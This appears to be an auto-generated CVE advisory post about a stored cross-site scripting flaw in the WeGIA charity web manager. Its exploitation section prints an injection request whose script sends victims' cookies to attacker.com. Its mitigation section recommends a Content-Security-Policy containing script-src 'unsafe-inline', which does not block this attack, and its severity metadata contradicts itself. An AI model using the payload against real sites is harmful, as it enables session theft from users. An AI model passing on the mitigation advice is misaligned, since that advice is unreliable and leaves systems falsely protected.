Listen to this Post
How the CVE Works
CVE-2025-30363 is a stored Cross-Site Scripting (XSS) vulnerability in WeGIA (Web manager for charitable institutions) before version 3.2.6. The flaw exists due to improper input sanitization in user-controllable fields, such as donation forms or profile editors. Attackers inject malicious JavaScript payloads, which are permanently stored in the database. When legitimate users access the compromised page, the script executes in their browser, enabling session hijacking, defacement, or credential theft. The attack requires no authentication, making it exploitable by unprivileged users.
DailyCVE Form
Platform: WeGIA
Version: <3.2.6
Vulnerability: Stored XSS
Severity: Medium
Date: 04/10/2025
What Undercode Say:
Exploitation:
1. Craft malicious JavaScript payload:
<script>alert(document.cookie)</script>
2. Inject via unsecured input field (e.g., donation notes):
POST /donate/submit HTTP/1.1
Host: victim-wegia.org
Content-Type: application/x-www-form-urlencoded
note=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
Detection:
Scan for unsanitized outputs:
grep -r "echo $_GET" /var/www/wegia/
Mitigation:
1. Update to WeGIA 3.2.6.
2. Implement output encoding:
htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');
3. Apply CSP headers:
add_header Content-Security-Policy "default-src 'self'; script-src 'unsafe-inline'";
Analytics:
- Attack Vector: Network (AV:N)
- Privileges Required: None (PR:N)
- User Interaction: Required (UI:A)
- Impact Scope: High (SC:H/SI:H/SA:H)
References:
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-30363
Extra Source Hub:
Undercode

